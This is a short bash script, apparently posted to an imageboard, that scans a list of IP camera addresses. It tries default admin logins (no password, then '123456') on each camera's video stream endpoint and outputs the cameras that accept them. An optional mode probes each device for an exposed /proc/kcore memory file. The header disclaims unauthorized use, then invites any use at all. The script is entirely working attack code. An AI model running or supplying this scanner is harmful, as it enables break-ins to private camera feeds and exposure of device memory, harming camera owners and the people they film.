1. #!/bin/bash
  2. #
  3. # By evil @ 8ch.net/ipcam/
  4. #
  5. # This is a proof of concept and is not intended to be used
  6. # to gain unauthorized access to IP camera systems. Otherwise,
  7. # do whatever the fuck you want with it.
  8. #
  9. # Load a list of IPs into a file called iplist.txt
  10. # Use the format http://123.456.789.000:8080 ... one IP per line
  11. #
  12. # ./findcams.sh $ARGUMENT1 $ARGUMENT2 $ARGUMENT3 > $OUT_FILE
  13. #
  14. # $ARGUMENT1 => dokcore | nokcore
  15. #
  16. # $ARGUMENT2 => curl timeout, use 2 for fast and 4+ for long distances
  17. #
  18. # $ARGUMENT3 => out file, list of unpatched kcores
  19. #
  20. # $OUT_FILE => out file, list of default u/p IPs
  21. #
  22. # EXAMPLE 1: Test a list of IPs but do no check for patched kcore
  23. # $ ./findcams.sh nokcore 2 > defaultout.txt
  24. #
  25. # EXAMPLE 2: Test a list of IPs and check for patched kcore
  26. # $ ./findcams.sh dokcore 2 kcorelistout.txt > defaultout.txt
  27. #
  28. # Script will generate a pipe delimited list for each out file
  29. # IP | USER | PASS
  30.  
  31. IPS="$(< iplist.txt)"
  32. for IP in $IPS; do
  33.     TRY1="$(curl -sL -m $2 -w "%{http_code}" "$IP/videostream.cgi?user=admin&pwd=" -o /dev/null)"
  34. echo $TRY1    
  35. if [ "$TRY1" -eq 200 ]
  36.     then
  37.         echo "$IP | admin | nopw"
  38.     else
  39.         TRY2="$(curl -sL -m $2 -w "%{http_code}" "$IP/videostream.cgi?user=admin&pwd=123456" -o /dev/null)"
  40.         if [ "$TRY2" -eq 200 ]
  41.         then
  42.             echo "$IP | admin | 123456"
  43.         else
  44.             if [ "$1" = "dokcore" ]
  45.                 then
  46.                 TRYKCORE="$(curl -sL -m $2 -w "%{http_code}" "$IP//proc/kcore" -o /dev/null)"
  47.                 if [ "$TRYKCORE" -eq 200 ]
  48.                     then
  49.                     echo "$IP | kcore-found" >> $3
  50.                 fi
  51.             fi
  52.         fi
  53.    fi
  54. done